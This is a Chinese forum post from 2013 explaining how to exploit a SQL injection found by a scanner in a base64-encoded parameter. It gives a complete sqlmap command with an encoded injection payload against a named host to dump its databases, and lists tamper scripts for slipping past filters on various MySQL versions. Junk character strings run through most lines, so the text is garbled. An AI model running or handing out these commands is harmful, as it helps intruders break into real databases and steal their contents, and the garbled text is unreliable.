WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
0 R6 I- q& n" X1 ?9 h1 ^5 H8 [. {3 v, F" @2 d) f2 \8 J
sqlmap的tamper里有个base64encode.py
: ^( y) ?& R6 h# C x: s$ M1 i1 K* g3 T$ N* O
使用如下. e' s u" R+ b. {/ `
# Y/ W2 C$ a( Y5 |: c8 b1 q
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs, O* w9 T* {: E3 G; n) d& @
6 A P: I- `( _6 [& j. Z) I
3 G+ {" j C; Q* k0 rsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”2 v$ B9 z, D( S* p
9 e# U1 M3 `5 L/ ^4 y: I4 f
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:9 M3 N# i: [# O3 d! f9 {
) G i$ e/ l( F P; F
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入! L! k+ [0 r" m0 S. [( C
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
$ q- R& |& S5 i @ b( U) V首先确定目标数据库版本,然后选择相应的脚本。% r# ]4 b2 z: y# g1 M% I/ E9 ?
-v 3 --batch --tamper "space2hash.py"
+ P- \* s: Q2 D* T5 @3 e
8 M) |% \, x/ _6 g! Y2 g( T还有其他一些插件:! l J; q8 z0 M* X% O6 Y
encodes编码 ——charencode.py- d( m. M/ o' A/ `+ f) N" r
base64编码 —— base64encode.py& N5 h8 n4 _, c4 I p9 |( v
替换空格和关键字 —— halfversionedmorekeywords.py- t" p. [8 A" i5 t) m# K
|
% Q$ u2 S- N! h
8 J& c9 H8 ~* S1 H" r: P; a& o
: r, q9 L8 ^* }, x( _3 r1 h9 }
9 @6 O: _# s. T; C3 x! _; U& e |
发表于 2013-11-23 15:50:45
收藏
支持
反对